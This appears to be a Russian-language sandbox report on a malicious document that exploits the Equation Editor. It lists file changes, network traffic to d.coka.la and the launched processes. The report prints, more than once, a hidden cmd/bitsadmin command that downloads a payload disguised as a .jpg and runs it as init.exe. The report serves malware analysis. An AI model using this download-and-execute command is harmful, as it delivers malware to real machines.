Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer WS /priority foreground https://d.coka.la/SEUkez.jpg %USERPROFILE%\init.exe && start %USERPROFILE%\init.exe
Изменения в файловой системе
Создает следующие файлы
- %WINDIR%\temp\caba309.tmp
- %WINDIR%\temp\tara30a.tmp
- %WINDIR%\temp\caba34a.tmp
- %WINDIR%\temp\tara34b.tmp
- %WINDIR%\temp\cabb983.tmp
- %WINDIR%\temp\tarb984.tmp
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\temp\cabe921.tmp
- %WINDIR%\temp\tare922.tmp
- %WINDIR%\temp\cabfecd.tmp
- %WINDIR%\temp\tarfece.tmp
Удаляет следующие файлы
- %WINDIR%\temp\caba309.tmp
- %WINDIR%\temp\tara30a.tmp
- %WINDIR%\temp\caba34a.tmp
- %WINDIR%\temp\tara34b.tmp
- %WINDIR%\temp\cabb983.tmp
- %WINDIR%\temp\tarb984.tmp
- %WINDIR%\temp\cabe921.tmp
- %WINDIR%\temp\tare922.tmp
- %WINDIR%\temp\cabfecd.tmp
- %WINDIR%\temp\tarfece.tmp
Сетевая активность
TCP
- 'd.##ka.la':443
UDP
- DNS ASK d.##ka.la
Другое
Создает и запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer WS /priority foreground https://d.coka.la/SEUkez.jpg %USERPROFILE%\init.exe && start %USERPROFILE%\init.exe' (со скрытым окном)
Запускает на исполнение
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\bitsadmin.exe' /transfer WS /priority foreground https://d.coka.la/SEUkez.jpg %HOMEPATH%\init.exe
